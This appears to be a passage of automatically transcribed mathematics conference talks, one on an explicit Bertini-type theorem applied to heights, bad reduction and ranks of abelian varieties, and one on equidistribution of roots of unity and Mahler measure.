So keep that in mind, for elliptic curves, it was rather easy if we know these formulas. So let's see what happens in the higher dimension. Okay, so now we're ready to give the first theorem. So Bertini type theorem, I will first state the theorem and then I will explain why it's interesting and give you a little bit of background maybe on Bertini theorems afterwards. So here it is, we will take a number field and we will fix a set of numbers, algebraic numbers, with finite Northcott number. Let me recall, what does it mean? It is, it means if the Northcott number is finite, there's a way to find infinitely many algebraic numbers with bounded height on S. In particular, S cannot be a number field, it has to be a little bit bigger. So now let X be a smooth closed variety in Pm, dimension bigger equal to 2. There exists a finite set inside this big S and a curve C, so a projective variety of dimension one that is defined over K over little s. So it might be only defined over the number field, the base field, but it might also be that we need to extend the base field to have enough core coefficients to actually describe the curve C. This curve C is drawn on X if you want, so there's a there will be an immersion inside X. This curve is smooth, irreducible, and such that we have three controls. The genus of that curve is controlled by the degree of X square plus the degree of X. So the degree of X is essentially the degree of the polynomials that describe X in the projective embedding. Now the degree of C, so how complicated is C in terms of polynomials describing it, it cannot be bigger, it may be chosen so that it's not more complicated than X, in fact the degree is controlled by the degree of X. And now the height of C, so the height in the sense of two forms you remember, so basically the height of the model that we get for the curve C is controlled by the height of X plus a factor that depends on the dimension, the degree of X that's expected, and what do we have here, the Northcott number. So basically the size of C, of the curve C is controlled by the size of X, and eventually some of the coefficients that we needed to actually compute that curve C. So it's rather natural, even though there's a lot of invariance, it's a rather natural statement, basically it says okay you start with a variety, there is a way to build up a curve that has controlled genus, controlled degree, and controlled height in a very explicit way. So that's the result, the first result that we have. So I will now comment a little bit on it. So first of all what's a Bertini theorem, so maybe let me just explain the following thing. If you have a variety given by some polynomials of dimension G, then let's imagine you cut that variety with a hyperplane, so cut what does it mean, you add an equation, a hyperplane equation, so now the new system that you get describing the intersection has dimension one less. So the goal of a Bertini statement is to say okay when I do that process, if I start with something smooth, am I still smooth? If I start with something irreducible, am I still irreducible? If I start with a property A, am I keeping that property A, if you want, when I do this intersection. And why is that important? Well if you know how to control that, then you have a perfect tool to build proofs by induction. 
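Very roughly, and writing N(S) for the Northcott number as before, the Bertini-type theorem stated above has the following shape; the constants c1, c2, c3 depend on m, dim X and deg X and are explicit in the paper, which the transcript only paraphrases:
\[
  g(C)\;\le\;c_1\big((\deg X)^2+\deg X\big),\qquad
  \deg C\;\le\;c_2\,\deg X,\qquad
  h(C)\;\le\;c_3\big(h(X)+\mathcal N(S)+1\big),
\]
for a smooth irreducible curve C contained in X and defined over K(s), where s is some finite subset of S.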
So if you start to prove some statement, if you want to prove some statement in algebraic geometry and you have such a tool that says oh I start with something smooth, if I cut then I find something that is dimension one less, still smooth, still satisfying the hypothesis I'm interested in, that in fact you're starting to build up some, some, or there's an option of building up an induction argument, so that's very useful in fact. So here if you want, I only mentioned that we can find a curve, but of course how do you get a curve? Well basically you cut and cut and cut until you find something of dimension one, and then you have eventually some components and there's a way to to single out the one that you like, and that's the curve that you that you get. So in fact in the proof of that statement that I that I have here on the screen, I'm using several times some classical Bertini arguments to get, to get, to get a curve in the end, something of dimension one in the end, okay, so it's already built in if you want in the proof. So first remark that I just said, Bertini theorems are very useful in particular for induction arguments. Okay, so now how do you prove this result? We rely on some previous works of Philippe Raymond for the, for the height part or the fact that that we can control some of the intermediate steps in the height, and then Kedore and Tamagawa, they explained how to get an explicit control on the genus. So the real, except for really writing down the proof and getting all the details correct, the real new input if you want in this part on the Bertini statement is really the dependence in this SDR, automatic control on the coefficients that we are actually using to create this curve. Okay, so now that's, that's what I wanted to say as a general, like that was the main first part, generalities. So the goal now is to use that statement in the case of a billion varieties where there's many open questions that I'm interested in about essentially the more elevated group, for instance, so the rational points of the a billion variety. So, so that's the, that's what I'm planning to do now for the second part. All right. So a billion variety and a billion variety, it's like an elliptic curve for those who maybe don't manipulate that every day. It's, it's a group variety that is algebraic, and that is projective. So it means you have equations, you have nice projective equations, and you also have a group structure really like similar to what is happening for elliptic curves, if you want. So examples of a billion varieties, you take your favorite elliptic curve and then use E, and then you do E cross E cross E G times, and then you get something that is already something of dimension G. Anyway, so I'm picking an a billion variety of dimension G defined over in the field in the second part. And now, if, if I insist that there's a principal polarization on it, so it's an additional structure that you can add sometimes, then we may even assume that the curve C that comes from the Bertini statement that we gave, so an a billion variety is projective, I can use the Bertini statement, it provides me with a curve C, right, that has controlled genus, controlled height, controlled degree. Now, I can even assume that this curve in fact satisfies the following. So this curve has a Jacobian, so there's a way to build another a billion variety that knows quite a lot about the curve C itself. 
And then in fact, the a billion variety I start with can be seen as a sub a billion variety of the Jacobian. So you see the, the structure will be like, we have an a billion variety, on this a billion variety we draw a curve, and in fact, we may even choose that curve such that the a billion variety can be viewed as a sub variety of the Jacobian. So the curve knows things in both ways in a way, this is a bit vague, but it will maybe be clearer in a moment. So now I want to consider a quantity of interest, Q of a k in my notation, what does that mean? Well, it will be something that depends on a, and that depends on k on the arithmetic of k. So it could be, for instance, let's say the rank of the model of a group of a over the number field k, or maybe the number of torsion points, you see, it will depend on a, it will depend on k. It could be even just a dimension of a, it could be, what's the smallest norm of a prime where you have super singularity, what's there are many, many quantities of interest that depend on a, and that depends on the base field. And I want to study all of them at the same time. So I, what basically I'm going to describe here is a machine that will help us getting some diaphanetic information about Q. So pause a little bit, you have a quantity of interest, maybe you're interested in the rank, maybe it's the torsion, maybe it's some special primes, and you want to know what you want to know if that quantity can be controlled by the height of the variety. So you want to know, is it possible that the rank is controlled by the height, let's say, or that the torsion is controlled by the height. So that's a very diaphanetic question, because basically it says you have a variety in front of you, and it has some equations. And then you're interested in something about that variety, and you want to know if you can guess something about the quantity in terms of the equation. Okay, so as you've noticed here, I'm using the faulting height. So basically, I'm not using the equation. So the question is even deeper, it's more like, you have an abelian variety, no matter what the type of equations you use to describe it, then the height will be controlling this quantity. This is basically what it means. So because I'm using the faulting height here is something more interesting. So it should not depend on the model. So it should be something that is really, that has a meaning in itself for the variety, if you want. So basically, you want to know, is it possible to bound the quantity of interest? And then to be precise, of course, you have to say, well, there might be some, some little error term or something, and it should not be depending on a, or at least, maybe just on the dimension, that's what we want to allow. Okay, so that's the generic question, is it possible to control the quantity? So let me list some desirable properties for that, that quantity Q, that, that allow us to actually prove something. So E will be pick an extension of K. So we started with a number field K, let me pick an extension of K, called a K prime. Now I would like this quantity to grow with extension, or at least, because you see there's a little C, not to decrease too, too, too much. So if I'm allowing it to decrease, it has to be with a somehow a bounded amount, it has to, they have to be similar comparable. Okay, so E stands for extension. So for extension, I would like the quantity to kind of grow, or at least not to drop too much. So now P will be product. 
So now imagine you have a product of a billion varieties, I would like that quantity to grow with respect to products. So as you can see in this formula, I'm breaking the symmetry a little bit, but you can take max of AB here, it doesn't matter because A cross B is B cross A. So basically just the quantity for A cross B has to be bigger than the quantity for A. That's P for product. And then I will be another desirable property. So I would like my quantity not to move too much in an isogenic class. So an isogenic is a morphism with finite degree, finite kernel. So I mean an isomorphism is an isogenic, and then you may allow a little quotient of finite number of elements in the kernel. So basically if you look at A, you start with A and you take a look at all a billion varieties that are not too far for that matter, so isogenous, then this quantity should not move too much. That's I, that stands for isogenous. And then I have a a lost, lost property and that will be the result I would like to prove. So I would like to have that the height is controlling the quantity for any a billion varieties and then you see here in J, I'm only asking it for Jacobians. So I'm, so J has, as you can see it's in blue, has a little bit of a different flavor than the other ones. The other ones are like really axioms in a way, like this is really the kind of quantities that we can deal with. And then starting with J, you're starting to prove, I mean you want to prove the inequality height of A is bigger than the quantity A, k. And basically what the machine will tell us is that it suffices to to do it for Jacobian. So this J has a little bit of a different, different feeling for me at least. Okay, anyway, so keep in mind we have extension, product, isogenes and the Jacobian case, which is a sub case of the general case. So now here is the machine. So the theorem says we start with a number field, that's the base field, and then we take a Northcott set with finite Northcott number. So that's the set S. And then assume that you have a quantity of interest Q and that satisfies E, P and I, and that J works. So that the inequality we want to prove is actually working for Jacobians. In that case, you get what you want, except that you, of course, will get a dependence on the set you started with. Okay, so you need to be able to compute or at least to bound from above the M of S, such that you have something explicit here. So what is this machine? Basically the machine says you have a quantity of interest, you want to bound it from above by the height. Then you can reduce the whole proof to the case of Jacobians, which is a sub case where we have more tools in general. And luckily, you can prove the case of Jacobians and then you get the general result. So that's what the machine tells you. It says, if you can prove this inequality only in the sub case of Jacobians, then you can actually get the general, the general result. Okay, so that's the machine. And now I would like us to learn from the machine altogether. So let's see what we can actually prove with that reduction step that we describe here. So this is my first example. I'm going to consider primes of bad reduction. So now I'm defining my quantity of interest. What is of interest? What am I interested in? Well, I have my abelian variety and I'm very interested in understanding when is, is it that when you reduce mod p, you have a singular node set, let's say, when, when, when is it that you have bad reduction? That's important for many applications. 
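Before the bad-reduction example gets developed, here is a schematic summary of the four properties and of the machine, as one can extract them from the talk (the exact constants and their dependences are not spelled out in the transcript):
\[
\begin{aligned}
(E)&:\quad Q(A/K')\;\ge\;Q(A/K)-c
      &&\text{for finite extensions } K'/K,\\
(P)&:\quad Q\big((A\times B)/K\big)\;\ge\;Q(A/K),\\
(I)&:\quad Q(B/K)\;\ge\;Q(A/K)-c
      &&\text{whenever } A \text{ and } B \text{ are isogenous},\\
(J)&:\quad Q\big(\operatorname{Jac}(C)/K\big)\;\le\;c\,\max\big(1,\ h_F(\operatorname{Jac}(C))\big)
      &&\text{for Jacobians of curves } C/K.
\end{aligned}
\]
The machine then says: if Q satisfies (E), (P), (I) and the Jacobian case (J), then Q(A/K) is bounded by a constant times max(1, h_F(A)) for every abelian variety A over K, the constant depending on the dimension and on the Northcott set S (through its Northcott number) used in the construction.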
So, so it's actually something that it's nice to control. It's actually nice to be able to guess or to find explicitly where these primes are. So now p is a prime ideal that runs in O_K, and I'm focusing on semistable bad reduction because I'm allowing myself to do finite extensions of the base field in the proof. So that's not a problem. So now I'm going to check the desirable properties just to make sure I can use the machine. So I will start with E, and in fact E is not completely easy. E was extension. So it means that I take my quantity, so the norm of the bad primes, and I want to know what's happening when I do extensions of fields. But as you know, if you take the norm of an ideal and you now start to extend the field where you take this norm, if the ideal is ramifying, then the quantity will not increase. So with the extension property we're now already in trouble. So the thing is, we can control that by controlling the ramification of K prime. So now if, let's say, you take an unramified extension, then you know this quantity is not going to drop. So basically if you start with a base field K, and you can find enough numbers of bounded height in an unramified extension, you're good to go. You have enough numbers so that you will be able to use the Bertini statement to build the curve, etc. But this is not always possible because some fields don't have enough unramified extensions. Sometimes they don't have any. So basically there's a lot of arithmetic here. The main result that we use to ensure that it's possible to reduce to a case where we have enough unramified extensions is a theorem of Golod-Shafarevich from the 60s, where you actually find a way to build a tower, an infinite tower, in fact with steps that are extensions of degree two, where you have unramified extensions. So basically it's possible to deal with this and to ensure that E works, but it will not be for any S. It will be for an S that needs to be built and that needs careful treatment. Okay, but it is possible. It's part of the result. So, okay, extension we get. Now, the good news is that the others are easier. Now, product is easy because if you have a bad prime for A, of course it will be a bad prime for A cross B. So then we have P for free, and we have I for free. So I'm saying easy, it is not completely easy, but it relies on some existing results. So isogenous abelian varieties, they share the same bad primes. So then of course the quantity will not move in that case. So we have E with some work, P is easy, I relies on some previous works. So we're good to go. We have a quantity that could lead to something. The thing is the J: is it easier for Jacobians? So basically I'm telling you how to reduce an inequality to the subcase of Jacobian varieties, but if it's not easier for Jacobians, then you just did everything for nothing. So we need to work a bit further. Jacobian case: luckily, of course, I selected that example because we know how to do something. So for J we can use what is called the arithmetic Noether formula. So it's not an easy formula. It comes from Arakelov geometry, but it says the following. If you have a semistable curve C, this Faltings height, this very intrinsic height, has a closed expression, a closed formula that goes like this. So it's a sum of some integers times the logs of the bad primes, plus other terms.
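Spelled out schematically (suppressing the exact normalization and the bounded archimedean constants, which the transcript does not give), the arithmetic Noether formula for a semistable curve C of genus g over K, as used here, reads:
\[
  12\,[K:\mathbf Q]\;h_F\big(\operatorname{Jac}(C)\big)
  \;=\;\widehat{\omega}^{\,2}
  \;+\;\sum_{\mathfrak p}\delta_{\mathfrak p}\,\log N_{K/\mathbf Q}(\mathfrak p)
  \;+\;\sum_{\sigma:K\hookrightarrow\mathbf C}\delta(C_\sigma)
  \;+\;O\big(g\,[K:\mathbf Q]\big),
\]
where omega hat squared is the self-intersection of the dualizing sheaf, delta(C_sigma) is Faltings' delta invariant, and the delta_p are non-negative integers which are at least 1 at the primes of bad semistable reduction; this is exactly how the lower bound discussed next is extracted.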
So this is precisely log of the bad primes that I'm interested in. These integers are bigger or equal to one. As soon as you have semi-stable bad reduction, this is precisely what I want to control. So I can just lower bound delta P by one. And then I have some other terms. So this delta sigma, this is what is called a delta invariant of feltings. It's a, I mean, it's an analytic invariant that is rather mysterious. And then omega square is the dualizing chief, auto intersection of the dualizing chief of the curve. It's also something rather abstract. Luckily, recent work of Robert Wilms that appeared in the, in the Tionist math in 2017, lead to this sum. So the extra terms that we have here being non-negative. How nice. So basically what does it mean? It means we have J. You see, this is the height, feltings height that we, that we want on the left side. And then this is the bad primes that we want on the right side. And we have the inequality that goes in the right direction. So we have J. If we have J, because we have E for a specific S, P, EZ and I coming from previous works, then basically we have the result. The machine tells us feltings height is in fact controlling the bad primes. So if you want to go into the details, in fact, the S that I found is even controlled by a constant that depends only on G. So there are other proofs of that inequality that are rather recent. And they use a different technique. So they come from, the first one comes from a Hingery and Pachyco, they were, they proved this for function fields, a billion variety of function fields. And that was adapted by Vazhner and his PhD. So there's another way to prove this inequality by using rigid uniformization. So it's a different, completely different way. And then you have Robin de Jong and Faber-Chukrier, a bit recent, that gave another proof using Verkovich spaces. So both proofs are used rather, rather heavy machinery. And, but they lead to the same, in fact, to slightly stronger results. I can give you some details if you want one day. When we have a blackboard again, I can maybe give a little bit more on this. Anyways, so this inequality now is correct. And it actually leads to an interesting corollary that I'm now going to give you. Interesting corollary. And this is this upper bound on the rank. So because I have the control on the bad primes by the height, and because I know how to do descent on general abelian varieties, so that's a different technique, something, something else, I can prove that the rank of a is bounded above by the following expression. So take a look. So now I have some explicit constant C that depends on the dimension of a. And then I have the degree of the base field to the cube. And then I have max of one log of the discriminant of the base field. So the primes that ramify in the base field. And then the defaulting site of the abelian variety. So this is unconditional. This is really something that you have. Using combining both inequalities, one that says the rank is controlled by the bad primes. This is the descent argument I mentioned. But I didn't explain here. And then what I explained here is bad primes is controlled by the height. And so if you combine both, of course, you get that the rank now is controlled by the height with this explicit expression here. So that triggers the following question. Is there any hope to do better? I mean, we would like to know how the rank is varying, say for elliptic curves over Q even. We don't know if it's bounded or not. 
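In symbols, the unconditional corollary just stated is of the form (with c(g) explicit; the grouping of the three quantities inside the max is as I read the description, the slide itself not being visible in the transcript):
\[
  \operatorname{rank}A(K)\;\le\;c(g)\,[K:\mathbf Q]^{3}\,
  \max\big(1,\ \log|\Delta_K|,\ h_F(A)\big),
\]
for any abelian variety A of dimension g over the number field K, where Delta_K is the discriminant of K.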
And they're competing heuristics. Try to understand if it's bounded or not. And if it's bounded by what and to understand a little bit more about families of these elliptic curves or of these abelian varieties. So now what can we expect using these techniques of diaffantine inequalities? So there's one thing that I would like to know. Is it possible to get rid at least of the discriminant here? This is something that would be interesting to know. I mean, the bound on the rank has to depend on the field, on the base field. Because, I mean, otherwise you get something crazy. I mean, if you increase the base field, you get new points. And there's a way to prove that. In fact, the rank is growing indeed. So it has to depend on the field. You know you need a dependence on the field in the upper bound. But do you really need the discriminant? Discriminant is a complicated invariant. Degree is a very easy invariant. So if the control could be only in terms of the degree, we would be rather astonished and happy. I would be happy at least. So that's the question I have. Is there any hope of doing better? But now we have a machine. We can use that machine maybe and check what's happening. So what's happening here in this last part? I'm now fixing that the quantity of interest, the new quantity of interest is the rank itself. Not the bad primes log of the norm of the bad primes, whatever from before. Now it's the rank itself. So now let's me check the desirable properties to see if I can use the machine. So now extension. Yes, when you increase the base field, you increase the rank. Or maybe you stay stable, but at least you don't go down. So E is easy. So now P is easy as well. Because if you have an abelian variety, if you cross with another one, then you can only add in the rank. So the product is also easy. And now isogeny is also easy because I mean, recall an isogeny has finite kernels. So you cannot kill a direction. You cannot drop the rank here. So we have E, P and I. So it means that we are now reducing to the case of Jacobian using the machine. So what's the case of Jacobian? So we have to be very careful here because if we just take the rank here and if we just take the faulting site here, some properties about the faulting site tell you that this kind of inequality will not hold like that. You need a dependence on the base field extra. Because basically the faulting site has a tendency to drop by extension until it reaches semi-stability and then it's stable. It stays constant. So basically this inequality would be the rank is bounded by something that does not depend on which is not correct. So it means that in this inequality, you need a constant that depends at least on the degree. Okay, fine. So then what happens if we assume that then in fact we reach what is called the Hondas conjecture. So Hondas conjecture says the rank of an abelian variety over a number field could be, would be, maybe is controlled by a constant depending on A times the degree of the base field. So this is slightly more precise or maybe a bit stronger form of Hondas conjecture. So it's a conjectural statement that says that in fact the rank is controlled linearly in terms of the degree as soon as you fix A. And what we say here is that if the constant depending on A in the, in the, in this inequality is in fact linear in the height or polynomial in the height, it will be similar. Then in fact the whole proof boils down to proving the Jacobian case. 
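For reference, the conjecture under discussion, in the slightly stronger form described, can be written as
\[
  \operatorname{rank}A(K)\;\le\;c(A)\,[K:\mathbf Q]
  \qquad\text{(Honda's conjecture)},
\]
for every number field K over which A is defined; the refinement asks whether one may take c(A) to be a constant depending only on g = dim A times a polynomial in max(1, h_F(A)), and the reduction explained in the talk says that this version would follow from the corresponding inequality for Jacobians.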
So you, I mean the machine doesn't give you that completely directly because there's this extension of field that you need to do and you need to check quite a few details, right? But the philosophy is really this. The philosophy says you think a little bit with the engine, this is what I wrote. So the philosophy says, okay, so basically if you want to prove Honda, you can start by Jacobians and you, you'll get there eventually using some reduction, some reduction step that is provided here by the machine. Okay. So now Honda is a very difficult conjecture and we don't, we don't really know much more in the Jacobian case in fact. So, so it's still, it's still something we think about. But anyways, we were pretty happy to see that we could reduce this statement to that. Good. So I think I've, I've said what I wanted and I would like to thank you for your attention. Yeah Fabien, thank you very much for your talk. There is already one question formulated. Yes. So I see a question in the chat by Schmidt Habegger. Yes. So he's asking whether your bound can be replaced by this bound here, constant times log of degree of isogenic. Yes. So, so the short answer is yes. I will now give maybe a little bit, a little bit more. So here you see he's referring to, to this, this C. So now if I have two isogen, two billion varieties and an isogenic, there's an important invariance is that the degree of that isogenic. So now if I allow myself here to have a log of the degree of the isogenic using work of master and Vistols, we can control the degree of a minimal isogenic by a polynomial in the height. But if I take the log of the degree, then I get a multiple of the log of the height. But I'm dealing with heights here linearly. So if I get imagine, I get some extra term here that is logarithmic in the height coming from errors. It won't matter in the end for the general statement. So the answer is yes, Philip, I can weaken the condition like that. Yes. Thank you very much. Is that satisfactory, Philip, or are there following up questions? Okay.
|
I will report on joint work with Martin Widmer. Let X be a smooth projective variety over a number field K. We prove a Bertini-type theorem with explicit control of the genus, degree, height, and field of definition of the constructed curve on X. As a consequence we provide a general strategy to reduce certain height and rank estimates on abelian varieties over a number field K to the case of Jacobian varieties defined over a suitable extension of K. We will give examples where the strategy works well!
|
10.5446/53724 (DOI)
|
Okay, thank you, Robert, and thank you for introducing me and inviting me to this virtual conference in DEMINI. So the title of my talk is Equidistribution of Roots of Unity and the Mahler Measure, and I will talk about joint work with Vaseline Dimitrov. Okay, so let me just take some classical facts. Let's look at how Roots of Unity distributes in the complex plane. So what I'm looking at here, these points, they are Roots of Unity of order dividing 30. So they are complex numbers of the form e to the 2 pi i k over 30. And I let k run over all integers. Of course, it's enough just to go from 0 to 29. And I get these 30 dots here, and they lie on the unit circle, of course, and as you can see, they are very nicely equidistributed along the unit circle. And the theorem here is that if you let the order or the end here, capital N, go to infinity. So if you're looking at all Roots of Unity of order dividing N, then these points will become equidistributed around the unit circle. So let me recall what that actually means. How can we formulate equidistribution in a precise way? So the same picture with the 30 dots on top. And let me just... Okay, so what does equidistribution mean? It means that if I have a test function defined on the unit circle, this function f here, which has to be continuous, complex values, then if I take the average of my test points, of the test points, the Roots of Unity, take the average of this function on these points, and then take the limit as downstairs here, then I'll converge to the integral of the function along the unit circle. So the integral of f long, e to the... Well, we've got here e to the 2 pi i t. So we're running along the unit circle here in the usual counterclockwise direction. And this limit exists and equals exactly the integral. So this is a very classical result, and it's also quite easy to prove. Let me just give you an idea how the proof works, because we'll see arguments like this later on in a more sophisticated way. So let's see what happens if we take a very basic function, which is just f of z takes... f takes z to the lth power, where l is some integer. And well, now our average here simplifies to this geometric sum here, which is taking the sum k from 0 to n minus 1, and then upstairs here in the exponent, we have e to the 2 pi i k over n, and as one learns in the first year calculus class. Even earlier, how to compute sums like this. Well, if n happens to be divisor of l, of course, all terms will be 1, and so the average will also be 1. And if l is not a divisor, if n is not a divisor of l, then geometric sum formula tells us that the sum here vanishes. So in the limit, if we take n going to infinity here, in this case, then we will eventually be in this situation here. If l is fixed, and so the limit will be 0 for l not equal to 0, and that is exactly the integral of the function along the unit circle. So if more generally, our function is a finite linear combination of powers of z, so possibly negative powers of z, then as I just explained up there, the only term that survives in the limit is l equals 0, and that corresponds here to the term a naught. So that's what we get here. So for n goes to infinity, this average is exactly the constant term here in this Laurent polynomial, and that happens to be exactly this integral. So for these finite Laurent polynomials, liquid distribution follows just by considering a geometric sum. 
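In symbols, the computation just sketched is the following, for a finite Laurent polynomial f(z) = sum over l of a_l z^l:
\[
  \frac1N\sum_{k=0}^{N-1}e^{2\pi i k\ell/N}
  =\begin{cases}1,& N\mid \ell,\\ 0,& N\nmid \ell,\end{cases}
  \qquad\Longrightarrow\qquad
  \lim_{N\to\infty}\frac1N\sum_{k=0}^{N-1}f\big(e^{2\pi i k/N}\big)
  = a_0
  = \int_0^1 f\big(e^{2\pi i t}\big)\,dt .
\]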
And in general, you can do some analysis to extend this kind of result to all continuous functions on the unit circle. That is what happens with roots of unity and continuous test functions. Up to now I have been looking at roots of unity of order dividing n, so there are always n points of that type in the complex plane. Now I want to shift to roots of unity of order exactly n, and as you see in the picture there can be a lot fewer: here we have only eight dots, and eight is the Euler function phi evaluated at 30. The number of roots of unity of order exactly n is the order of the group of units in Z modulo nZ, so it is given by the Euler function. These points are a lot sparser, and it is not so clear just from looking at the picture that you get equidistribution, because there is a huge gap here, a huge gap here, slightly smaller gaps there, and also a gap over here. Nevertheless, equidistribution is again a classical result. The corresponding average, where you average the Laurent monomial z to the l over the roots of unity of order exactly n, can be computed and is expressible, up to sign, in terms of the Euler function; as you see, there is a minus one in the exponent. So if n increases and l is nonzero, the argument of the Euler function grows essentially like n, and classically the Euler function grows almost linearly, like n to the one minus epsilon. So this term goes to zero for l nonzero, and we recover equidistribution just as in the first case. What is the significance of taking order exactly n versus order dividing n? The significance is of arithmetic nature: we are looking at roots of unity e to the 2 pi i k over n with k coprime to n, and these are exactly the Galois conjugates of any root of unity of order n. So this set has arithmetic importance because it is precisely the set of Galois conjugates of a root of unity. For roots of unity of order exactly n, with n going to infinity, we again get equidistribution. Here is a picture with n equal to 240, where you begin to see the nice distribution; there are still some gaps here and there, but they do not matter in the limit. What I am mainly going to talk about today is what happens in this definition of equidistribution if you weaken the hypothesis that the test function is continuous. Remember, you have to test your sequence against a continuous test function on the unit circle; what happens if we drop the continuity condition? There is a result by Matt Baker, Su-Ion Ih, and Robert Rumely from over ten years ago, which is also the motivation for the work presented today. They take an algebraic number alpha, and their test function is essentially log of the absolute value of e to the 2 pi i t minus alpha. Depending on the value of alpha, this may or may not be continuous; it may not even be defined on the whole unit circle, because if alpha itself lies on the unit circle you have log 0 at one point, a logarithmic singularity.
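In formulas, the test functions considered by Baker, Ih, and Rumely are

$$t\ \longmapsto\ \log\bigl|e^{2\pi i t}-\alpha\bigr|,\qquad t\in[0,1],$$

for a fixed algebraic number $\alpha$; this is continuous unless $|\alpha|=1$, in which case it has a logarithmic singularity at the value of $t$ with $e^{2\pi i t}=\alpha$.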
But nevertheless, they were able to show that if you take the average over the roots of unity of a given order, so over a Galois orbit like this on the left-hand side, and you let the order go to infinity, then this average converges to the integral, the same thing you would expect from classical equidistribution. Of course, you have to be a bit careful: a term may not be defined for a fixed k and a fixed alpha, but as we take n to infinity, for fixed alpha this difference will eventually be nonzero, because alpha is not a root of unity of order exactly n for n large enough, so the average is well defined in the limit, and the limit exists and equals the integral. As I pointed out, the proof depends on the value of alpha. The first case is when alpha is, for example, minus 1.5; in this case the test function is continuous, because there is no logarithmic singularity as t goes from 0 to 1. I have plotted the function in blue, below left; there is a minimum here, it is negative, but that is fine. So if alpha is not on the unit circle, their theorem follows from the classical equidistribution result I just mentioned, the one proved using Ramanujan sums. The situation becomes more interesting if alpha is on the unit circle, as here with alpha equal to minus 1: the function has a logarithmic singularity at t equal to one half, since e to the 2 pi i times one half equals minus 1, and that is where the problem is. In this case it is actually not a serious problem, as we will see, because e to the 2 pi i k over n plus 1, which corresponds to alpha equal to minus 1, cannot be too small if it is nonzero: it is roughly the difference of k over n and one half, which is bounded from below by 1 over 2n, in fact precisely. So an n appears inside the logarithm, and log n is negligible with respect to phi of n, which as we have seen grows almost linearly. So this case is slightly bad, but not really bad. The really bad case is the next one, where alpha is on the unit circle but is not a root of unity: for example, (3 + 4i)/5 lies on the unit circle and is an algebraic number, but it is not a root of unity. The trick I just explained does not work here, and in their proof they need linear forms in logarithms, Baker's linear forms in logs. So this splits the cases: the last case is much deeper than the other two; the first is classical, the second is fairly straightforward, and the third uses deep tools from transcendence theory. These three important cases will reappear when we move to higher-dimensional results. Let me first reformulate their theorem, the same theorem in a slightly more general dressing, and set up some notation for my talk: S1 will be the unit circle, with its Haar measure; mu infinity will be the roots of unity in the complex plane; and sigma will always denote an element of the Galois group of a cyclotomic field, which is classically isomorphic to the group of units of Z modulo nZ.
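In this notation, the theorem of Baker, Ih, and Rumely discussed above states that, for every algebraic number $\alpha$ (and $n$ large enough that all terms are nonzero),

$$\lim_{n\to\infty}\ \frac{1}{\varphi(n)}\sum_{\substack{1\le k\le n\\ \gcd(k,n)=1}}\log\bigl|e^{2\pi i k/n}-\alpha\bigr|\;=\;\int_0^1\log\bigl|e^{2\pi i t}-\alpha\bigr|\,dt\;=\;\log\max\{1,|\alpha|\},$$

the last equality being Jensen's formula for the linear polynomial $z-\alpha$.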
So their theorem can be reformulated as saying: if I take any nonzero polynomial p with algebraic coefficients, then the average of the test function log absolute value of p over the Galois orbit of the root of unity converges to the integral as the order of the root of unity tends to infinity. This follows directly from the statement I mentioned further up, just because a polynomial always factors into linear terms. Now this integral on the right has a nice interpretation: it is the Mahler measure of the polynomial. Jensen's formula allows you to compute the Mahler measure without computing an integral: it is the log of the absolute value of the leading coefficient plus the sum of the logs of the absolute values of the roots that lie outside the unit circle. So this is just a reformulation of the result on the previous slide using the Mahler measure of p. Let me continue. What I want to talk about today is what happens in higher dimension. By higher dimension I mean that instead of looking at a single root of unity I look at a tuple of roots of unity, zeta 1 up to zeta d; each has an order, we can find a common denominator n, and we say the whole tuple has order n. I will use a boldface zeta to denote a tuple, and being of order n is the same as saying that the gcd of the exponents together with n is one. The Galois orbit of such a point consists essentially of the powers of the tuple where the exponent is coprime to n. The first thing you see in higher dimension is that having the order go to infinity is not enough for equidistribution, because things can happen that do not happen in dimension one. For example, take the tuple (zeta, zeta), where zeta is a root of unity of order n. This tuple also has order n, but it is clearly not equidistributed on S1 cross S1 as the order goes to infinity, because both entries are the same. You could also take a square in one coordinate, or some other power, and the same non-equidistribution holds. So you have to be more careful in higher dimension, but the only thing to worry about is whether there are relations among the coordinates that are pathologically small. Instead of the order, it is therefore more reasonable to look at the following quantity, which in a sense generalizes the order to higher dimension: for a given tuple we look at the smallest nontrivial character whose kernel contains our tuple, that is, the least nonzero vector b with integer entries such that zeta to the b equals one; this character notation, with an integer vector in the exponent, is quite useful. This turns out to be the appropriate invariant, rather than the order, when looking at questions of equidistribution in higher dimension.
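Written out (with the norm on the exponent vector taken to be whatever normalization is on the slide; I use the sup norm as a placeholder), the invariant just introduced is

$$\delta(\boldsymbol\zeta)\;=\;\min\bigl\{\|b\|_\infty:\ b\in\mathbb{Z}^d\setminus\{0\},\ \boldsymbol\zeta^{\,b}=\zeta_1^{b_1}\cdots\zeta_d^{b_d}=1\bigr\},$$

and, for later reference, Jensen's formula mentioned a moment ago is

$$m(p)=\int_0^1\log\bigl|p(e^{2\pi i t})\bigr|\,dt=\log|a_D|+\sum_{j:\ |\alpha_j|>1}\log|\alpha_j|,\qquad p(z)=a_D\prod_{j=1}^{D}(z-\alpha_j).$$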
The classical fact, stated here, is that if we have a continuous test function on the d-dimensional torus S1 to the d (there is a typo on the slide), then the average of f along the Galois orbit converges to the integral of f over the torus with the product measure; but the convergence holds as this invariant delta of zeta goes to infinity. Having the order go to infinity is not enough, but delta going to infinity is fine. Let me also note that delta of zeta is always at most the order n, because zeta to the n is one, so (n, ..., n) is a nontrivial character whose kernel contains zeta; of course delta can be much smaller than n. So what is the conjecture for logarithmic singularities? Look at the test function coming from a polynomial p with algebraic coefficients: for a tuple, we take log of the absolute value of p evaluated at that tuple. Our conjecture is that if you average this test function over the Galois orbit, you converge to the integral of log absolute value of p as the delta invariant goes to infinity. A few comments are in order. First, the integral on the right is the higher-dimensional Mahler measure of a polynomial in d variables instead of one; even though the function is not everywhere well defined on the torus, the integral converges and is well defined. There is also the question of whether the sum itself is well defined, and this is a more serious question than in the one-dimensional case, because the vanishing locus of p on the torus can be more than a single point or a finite set of points; as we will see, it can have dimension greater than zero. To show that the average is well defined you have to show that for delta of zeta large enough the Galois conjugates do not lie on the vanishing locus of p, and that follows from a result of Michel Laurent, which is the case of the Manin–Mumford conjecture for the algebraic torus. So even showing that the average is well defined for delta of zeta large enough is a theorem. The conjecture itself is open, and I want to report on some progress towards it. In the case d equals one the conjecture is known, by the result of Baker, Ih, and Rumely. What kind of evidence do we have towards the conjecture in dimension greater than one? There is a result by Gerry Myerson from the 1980s, slightly extended by Bill Duke in 2007, of the following form. Here we look at roots of unity of prime order: zeta is a root of unity of prime order p, and the tuple we look at is (zeta, zeta to the a, zeta to the b). The whole tuple has order p, and a and b, which are only defined modulo p — good enough for us, since 